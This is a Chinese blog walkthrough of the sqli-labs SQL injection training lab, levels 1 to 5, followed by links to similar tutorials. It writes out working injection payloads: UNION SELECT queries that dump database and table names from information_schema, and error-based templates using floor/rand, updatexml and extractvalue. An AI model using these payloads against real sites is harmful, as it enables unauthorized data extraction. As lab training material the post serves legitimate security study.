SQL注入——sqli-labs靶场闯关(1~5)

已于 2022-02-25 09:17:30 修改
阅读量1.8k 收藏 13
点赞数 1
文章标签: sql 数据库 database
于 2022-02-24 19:13:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52072846/article/details/123115360
版权

Less-1 Error Based- String

1.经过语句and 1=2测试 ,页面回显正常,所以该地方不是数值查询

2.接着尝试在id后面加上',发现页面回显不正常,表示可能存在SQL字符注入

3.输入--+将sql后面的语句注视掉后,发现页面回显正常,则证明这个地方是单引号字符型注入

4.接着使用order by 语句判断,该表中一共有几列数据

  order by 3页面回显正常,order by 4页面回显不正常,说明此表一个有3列。

5.将id=1改为一个数据库不存在的id值,如861,使用union select 1,2,3联合查询语句查看页面是否有显示位。

发现页面先输出了2和3,说明页面有2个显示位
6.然后利用sql查询语句依次爆破出数据库内的数据库名,表名,列名,字段信息
例子:
?id=861' union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+
这是一个查询数据库名信息的语句

查询security内的所有表名
?id=861' union select 1,(select group_concat(schema_name) from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema='security')--+

Less-2 Error Based- String

1.输入?id=2-1页面信息发生变化,说明此处是数值型注入

2.order by 3  页面显示正常,order by 4页面显示不正常,所以该表有3列数据

接着可以使用联合查询进行注入,详细过程参考第一关

Less-3 Error Based- String

1.向页面输入?id=2'  --+页面显示不正常,

但是输入  ?id=2') --+ 页面回显正常,说明此处是字符型注入,而且是以 ('')的方式闭合字符串的

2.接着使用order by 判断表中有3列数据

 

3.接着使用联合查询,union select 1,2,3 判断页面是否有显示位   答案:有

下面使用第一关所使用的查询语句,测试一下

查询security内的所有表名
?id=48') union select 1,(select group_concat(schema_name) from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema='security')--+

Less-4 Error Based- String

与第三关类似,第四关使用   ("")   的方式闭合字符串,然后可以优先使用联合查询注入

1.当输入?id=3" --+时,页面显示不正常

 2.当输入?id=3") --+

Less-5 Error Based- String

1.经错测试发现,当输入?id=3时页面显示正常,具体如下

 当输入?id=999页面显示如下

 说明页面没有显示位。无法使用联合查询注入

2.接着我们尝试在URL中输入  ?id=2' 页面出现错误语句如下.

页面出现SQL语句报错,在这里我们就可以使用一种新的注入方式:报错注入
首先介绍三种报错注入常用的语句:
(1). 通过floor报错
and (select 1 from (select count(*),concat(( payload),floor (rand(0)*2))x from information_schema.tables group by x)a)
其中payload为你要插入的SQL语句
需要注意的是该语句将 输出字符长度限制为64个字符

(2). 通过updatexml报错
and updatexml(1, payload,1)
同样该语句对输出的字符长度也做了限制,其最长输出32位
并且该语句对payload的反悔类型也做了限制,只有在payload返回的不是xml格式才会生效

(3). 通过ExtractValue报错
and extractvalue(1, payload)
输出字符有长度限制,最长32位。

payload即我们要输入的sql查询语句

3.在这里我们使用floor报错语句进行注入
?id=2' and (select 1 from (select count(*),concat(((select group_concat(schema_name) from information_schema.schemata)),floor (rand(0)*2))x from information_schema.tables group by x)a) --+

 这里发现页面提示输出信息超过一行,但我们已经使用了group_concat函数,说明这里数据库名组成的字符串长度超过了64位,所以我们需要放弃group_concat函数,而使用limit 0,1来一个个输出
group_concat()函数的作用:将返回信息拼接成一行显示
limit 0,1  表示输出第一个数据。   0表示输出的起始位置,1表示跨度为1(即输出几个数据,1表示输出一个,2就表示输出两个)
接着我们运用如下语句:
id=2' and (select 1 from (select count(*),concat(((select schema_name from information_schema.schemata limit 0,1)),floor (rand(0)*2))x from information_schema.tables group by x)a) --+

 group_concat()函数的作用:将返回信息拼接成一行显示
limit 0,1  表示输出第一个数据。   0表示输出的起始位置,1表示跨度为1(即输出几个数据,1表示输出一个,2就表示输出两个)
接着我们运用如下语句:
id=2' and (select 1 from (select count(*),concat(((select schema_name from information_schema.schemata limit 0,1)),floor (rand(0)*2))x from information_schema.tables group by x)a) --+

 下面我们更该我们的payload一个个的查询我们要找的数据即可,这里不再演示

江月未来
关注
  • 1
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqli 1-4靶场闯关(sql注入)
laykr的博客
10-24 52
先试试看是什么类型的注入正确回显,说明不是数字型,?id=1'对比发现,mysql是用单引号闭合的源代码:成功回显,是字符型注入那么现在开始探测列数(为了union联合查询探测做准备)id =1 ' order by 3 --+ 其中的--+是为了过滤后面多余的',+在URL中会把解释为"空格",当然你也可以--' 来让后面的'闭合,这样也能实现一样的效果探测到只有3列,准备用union探测有回显的列(这是为了方便我们构造payload)
Sqlilabs靶场1-10关详解(Get请求式)
爱吃仡坨的Blog
10-16 2450
sqlilabs用到的是mysql数据库,mysql5.0以上版本自带的数据库是information_schema,其下有tables和columns两个表tables表中的table_name字段下是所有数据库存在的表名table_schema字段下是所有表名对应的数据库名。columns表中的column_name字段下是所有数据库存在的字段名。columns_schema字段下是所有表名对应的数据库
pikachu靶场sql注入通关教程-上)
最新发布
记录学习
05-19 792
pikachu靶场通关教程-上
Sql-labs靶场(1~28)
xhx836161547的博客
12-29 4850
sql注入经典靶场Sql-labs全关详解,正在加急更新中
sql注入靶场闯关Basic(1-5关)详细版
Zqinglele的博客
03-12 1403
1.尝试使用单引号进行注入,查看报错回显可知:插入后单引号与前单引号闭合导致后面报错,确定是字符型id=1’2.通过 # 进行注释,结果发现依旧报错id=1' #* 这时需要给 # 进行URL编码,这次页面回显没报错id=1' %23发现注入点,可以使用联合查询语句进行注入。
sql-labs 闯关 5~10
qq_44663230的博客
08-14 1452
sql-labs 第5~10关 盲注系列
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
PHP、Apache环境中部署sqli-labs(SQL注入靶场
01-08
PHP、Apache 环境中部署 sqli-labs(SQL 注入靶场) 知识点 1: sqli-labs 介绍 sqli-labs 是一款开源的练习 SQL 注入的靶场工具,用 PHP 代码编写而成。它需要 PHP 和 Apache 环境运行。sqli-labs 提供了一个实践 ...
sqli-labs靶场
02-12
sqli-labs靶场
SQL注入篇——sqli-labs最详细1-40闯关指南
热门推荐
爱国小白帽
01-11 3万+
使用sqllabs游戏系统进行sql注入 1.首先确定用哪些字符可以进行sql注入 一.选择Less­1进入第一关,在网址中添加标红内容,显示了用户和密码 http://localhost/sqllabs­master/Less­1/index.php?id=1’ and 1=1 ­­ ­ 把1=1改成1=2,不报错也不显示任何信息,说明可以利用 ’ 字符注入 二.进入第二关,在网址中添...
sqli-labs闯关小游戏21-65.docx
10-23
这是个关于sql注入的文档,是sqli-labs闯关小游戏二十一关到六十五关的详解,每一关的步骤写得都很详细,前二十关的话我已经发布了博客,有需要的可以下载一下。
sqli-labs靶场(1-22关)
weixin_51566481的博客
08-16 7414
sqli-labs,sql注入,burpsuit
sql注入练习sqli-labs/less1-2
vilice的博客
10-27 1134
sqli-labs/less1-2
sqli-labs靶场通关秘籍分享(1-10关)
weixin_45585955的博客
04-16 2609
一、 1、SQL注入原理:sql语句未经查询直接带入数据库查新,sql注入攻击其实就是服务端的攻击,它与操作系统、服务器类型、脚本语言无关 2、sql注入类型:分为数字型、字符型、搜索型、xx型 3、注入提交方式:get提交、post提交、cookie提交。 4、注入攻击提交支持的类型 union注入、information_schema、宽字节注入、报错注入、盲注,这里的盲注分为三种,分别是 布尔型盲注、时间型盲注、报错型盲注。 updatexml注入分为 insert注入、update注入
封神台-SQL注入实战靶场1-4题解题过程
qq_43367379的博客
05-19 1017
背景 这是最基本的显错注入 已经给出SQL查询语句 select * from user where id=1 不需要先去判断是字符型还是数字型,去一步一步测出sql查询语句了 废话不多说,直接上解题步骤 1.在url地址栏上 ?id=1 后面拼接 order by 3 说明: 所有操作都是在地址栏上拼接字符串实现的,没有借助工具 https://...?id=1 order by 3 结果为 正确显示 当前用户的账号和密码 2.在url地址栏上 ?id=1 后面拼接 order by 4 https://
pikachu靶场SQL注入解题思路
weixin_44500257的博客
02-21 1529
第一关 数字型注入(POST) 操作界面如下图 使用burpsuit对流量进行抓包,把数据包发送到Repeater模块进行测试 发送正常流量,web界面正常响应情况如下图所示 首先我们要了解该关卡注意的考点①数据类型是数字型②提交方式是POST 注入点的判断有很多方式,核心的思想就是id=后面的参数能否带入数据库查询,如果参数是数据库查询语句能否执行payload语句。 判断第一步:id=1 后面加 ‘ “ ‘) “)来查询后台SQL查询语句id的闭合方式 ‘ 报错 “报错 ‘) 报错 “
SQL注入闯关笔记
Sean的博客
03-17 2627
目录前言一、SQL注入是什么?二、靶场是什么?三、挖掘漏洞1.redtiger靶场1.第一关2.第二关3.第三关总结 前言 随着国家对安全越来越重视,个人感觉每个人都需要了解一下安全方面的知识。学习安全,先要从靶场做起,说干就干。 一、SQL注入是什么? 所谓SQL注入式攻击,就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令。在某些表单中,用户输入的内容直接用来构造(或者影响)动态SQL命令,或作为存储过程的输入参数,这类表单特别容易受到SQL注入式攻
sqli-labs第五关sql注入流程
qq_33598708的博客
03-30 5650
正常访问 http://127.0.0.1/sqli-labs-master/less-5/?id=1 判断注入类型 http://127.0.0.1/sqli-labs-master/less-5/?id=1' and 1=2 根据报错可以知道是字符注入,使用 ' 进行闭合。 通过 ' 闭合查询无返回的数据,无论是有数据返回还是无数据返回页面都不会显示相关的数据。 所以这关的重点是盲注。 http://127.0.0.1/sqli-labs-master/less-5/?id=

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值